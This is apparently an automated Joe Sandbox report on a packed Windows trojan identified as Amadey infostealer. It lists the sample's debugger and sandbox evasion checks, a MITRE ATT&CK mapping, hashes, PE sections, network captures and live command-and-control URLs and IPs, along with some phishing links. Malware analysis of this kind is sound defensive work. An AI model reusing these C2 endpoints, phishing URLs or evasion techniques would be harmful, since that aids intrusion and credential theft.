Source: C:\Users\user\Desktop\yqUQPPp0LM.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile opened: NTICE
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile opened: SICE
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00A19980 rdtsc 0_2_00A19980
Source: yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PProgram Manager
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.12:49713 -> 91.149.241.220:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
yqUQPPp0LM.exe46%VirustotalBrowse
yqUQPPp0LM.exe66%ReversingLabsWin32.Trojan.Amadey
yqUQPPp0LM.exe100%AviraTR/Crypt.TPM.Gen
yqUQPPp0LM.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fortth14vs.top/gduZ0%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd40%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah0%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377380%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb180%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=00%Avira URL Cloudsafe
http://home.fortth14vs.top/gduZE_.u0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fortth14vs.top
91.149.241.220
truefalse
    		high
    httpbin.org
    		34.197.122.172
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0true
      • Avira URL Cloud: safe
      		unknown
      http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlyqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpfalse
          		high
          http://html4/loose.dtdyqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            https://curl.se/docs/alt-svc.html#yqUQPPp0LM.exefalse
              		high
              https://httpbin.org/ipbeforeyqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahyqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://curl.se/docs/http-cookies.htmlyqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://curl.se/docs/hsts.html#yqUQPPp0LM.exefalse
                    		high
                    http://home.fortth14vs.top/gduZyqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4yqUQPPp0LM.exe, 00000000.00000002.2471420475.0000000001AFE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.se/docs/http-cookies.html#yqUQPPp0LM.exefalse
                      		high
                      https://curl.se/docs/alt-svc.htmlyqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://.cssyqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://home.fortth14vs.top/gduZE_.uyqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://.jpgyqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            91.149.241.220
                            		home.fortth14vs.topPoland
                            		41952MARTON-ASPLfalse
                            34.197.122.172
                            		httpbin.orgUnited States
                            		14618AMAZON-AESUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1582700
                            Start date and time:2024-12-31 09:44:37 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 7s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:yqUQPPp0LM.exe
                            renamed because original name is a hash value
                            Original Sample Name:00dacdc02143f49ba6542161592fea9d.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@9/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 52%
                            • Number of executed functions: 97
                            • Number of non-executed functions: 59
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.12.23.50
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            91.149.241.220ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            34.197.122.172ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                              Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                Set-up.exeGet hashmaliciousUnknownBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  home.fortth14vs.topZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                  • 91.149.241.220
                                  Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                  • 91.149.241.220
                                  httpbin.orgivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                  • 34.200.57.114
                                  ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                  • 34.197.122.172
                                  Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                  • 34.197.122.172
                                  Set-up.exeGet hashmaliciousUnknownBrowse
                                  • 52.202.253.164
                                  Set-up.exeGet hashmaliciousUnknownBrowse
                                  • 34.197.122.172
                                  Set-up.exeGet hashmaliciousUnknownBrowse
                                  • 52.73.63.247
                                  a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                                  • 3.218.7.103
                                  SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                  • 34.226.108.155
                                  TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                                  • 3.218.7.103
                                  FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
                                  • 3.218.7.103

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  MARTON-ASPLZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                  • 91.149.241.220
                                  Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                  • 91.149.241.220
                                  mips.elfGet hashmaliciousUnknownBrowse
                                  • 91.149.238.18
                                  ppc.elfGet hashmaliciousUnknownBrowse
                                  • 91.149.238.18
                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                  • 91.149.238.18
                                  arm5.elfGet hashmaliciousUnknownBrowse
                                  • 91.149.238.18
                                  arm7.elfGet hashmaliciousUnknownBrowse
                                  • 91.149.238.18
                                  harm4.elfGet hashmaliciousUnknownBrowse
                                  • 91.149.238.18
                                  harm5.elfGet hashmaliciousUnknownBrowse
                                  • 91.149.238.18
                                  harm4.elfGet hashmaliciousUnknownBrowse
                                  • 91.149.238.18
                                  AMAZON-AESUSivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                  • 34.200.57.114
                                  ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                  • 34.197.122.172
                                  Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                  • 34.197.122.172
                                  PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                  • 44.221.84.105
                                  http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                  • 44.199.56.69
                                  Set-up.exeGet hashmaliciousUnknownBrowse
                                  • 52.202.253.164
                                  kwari.mips.elfGet hashmaliciousUnknownBrowse
                                  • 54.226.65.111
                                  Set-up.exeGet hashmaliciousUnknownBrowse
                                  • 34.197.122.172
                                  https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                  • 3.88.121.169
                                  https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                  • 3.88.121.169

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                  Entropy (8bit):7.984789855787688
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • VXD Driver (31/22) 0.00%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:yqUQPPp0LM.exe
                                  File size:4'472'832 bytes
                                  MD5:00dacdc02143f49ba6542161592fea9d
                                  SHA1:cf9c6420db557dad6b86ca800d14cb8cba120657
                                  SHA256:be0554ab88f46d8e6b10243d7b28ae2ce724b43224af3954b62d015693089822
                                  SHA512:059c24fb495e88cba52cf4e8a1bbf7c73b6c6cf20cc45be410d6d8f63b9ee025908e2e3043614bbbb88eec25aca828d5647ca38ee8d0e0426c78445b22b61959
                                  SSDEEP:98304:M8T+aX+AvfAfY4Unal3z18I0+qzN9dDDR1M0hIozLjLdHN5w99xX4NfBfl:1yaXRfAfYvo3z90+w/dDLMenbLli9pUp
                                  TLSH:5F2633922FFB4376ECADEC7E04D07F9D71E173264896E09CDC947D5887530A272A248A
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...`........M...@..................................PD...@... ............................

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x1096000
                                  Entrypoint Section:.taggant
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                  DLL Characteristics:DYNAMIC_BASE
                                  Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Authenticode Signature

                                  Signature Valid:
                                  Signature Issuer:
                                  Signature Validation Error:
                                  Error Number:
                                  Not Before, Not After
                                    Subject Chain
                                      Version:
                                      Thumbprint MD5:
                                      Thumbprint SHA-1:
                                      Thumbprint SHA-256:
                                      Serial:

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007FE90888E8CAh
                                      hint_nop dword ptr [eax+eax+00h]
                                      add byte ptr [eax], al
                                      add cl, ch
                                      add byte ptr [eax], ah
                                      add byte ptr [eax], al
                                      add byte ptr [0000000Ah], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [0000000Ah], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      push es
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74c05f0x73.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x74b0000x2b0.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x7782000x688
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc941080x10ufmrywdo
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0xc940b80x18ufmrywdo
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x74a0000x28900010732989af025d04ee1f5c81512b8118unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x74b0000x2b00x20070bb495665e9c820e75ba29eea4cbb62False0.794921875data5.993344716006869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x74c0000x10000x20052564c2cea63394dbc4e71775ebabcc0False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x74d0000x3900000x200922dc0d999f215448a2d9fa92d018046unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      ufmrywdo0xadd0000x1b80000x1b74009410e37eb95b6a0482b8b3d02c1128c5False0.9944913426650541data7.956545640250439IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      gqgzmhdq0xc950000x10000x40008dedea419a1e951a7d7a0829d753c1dFalse0.7333984375data5.87847718293532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0xc960000x30000x2200c89ec1e6f15eb13b17cb0878c4668358False0.060776654411764705DOS executable (COM)0.7460674703198418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_MANIFEST0xc941180x256ASCII text, with CRLF line terminators0.5100334448160535

                                      Imports

                                      DLLImport
                                      kernel32.dlllstrcpy

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 31, 2024 09:45:34.989594936 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:34.989635944 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:34.989774942 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:35.103652954 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:35.103679895 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:35.767576933 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:35.768075943 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:35.768094063 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:35.769165993 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:35.769237995 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:35.770550966 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:35.770620108 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:35.778687954 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:35.778697014 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:35.825220108 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:35.902695894 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:35.902807951 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:35.902892113 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:35.914235115 CET49711443192.168.2.1234.197.122.172
                                      Dec 31, 2024 09:45:35.914258003 CET4434971134.197.122.172192.168.2.12
                                      Dec 31, 2024 09:45:37.011509895 CET4971253192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:37.017143011 CET53497121.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:37.020436049 CET4971253192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:37.021233082 CET4971253192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:37.026019096 CET53497121.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:37.689413071 CET53497121.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:37.702955008 CET4971253192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:37.703201056 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.708007097 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.708075047 CET53497121.1.1.1192.168.2.12
                                      Dec 31, 2024 09:45:37.708111048 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.708143950 CET4971253192.168.2.121.1.1.1
                                      Dec 31, 2024 09:45:37.720835924 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.725688934 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.725699902 CET804971391.149.241.220192.168.2.12
